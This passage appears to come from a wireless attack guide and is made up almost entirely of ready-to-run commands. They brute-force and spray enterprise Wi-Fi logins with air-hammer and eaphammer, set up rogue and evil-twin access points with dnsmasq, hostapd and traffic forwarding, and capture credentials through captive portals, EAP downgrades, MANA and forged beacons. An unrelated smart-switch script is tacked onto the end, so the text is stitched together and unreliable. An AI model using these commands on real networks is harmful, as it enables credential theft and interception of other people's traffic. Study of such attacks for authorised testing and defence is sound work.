If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Shelly.addEventHandler(function (event) {
if (event.component === "switch:0" && event.info.state) {
Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
}
});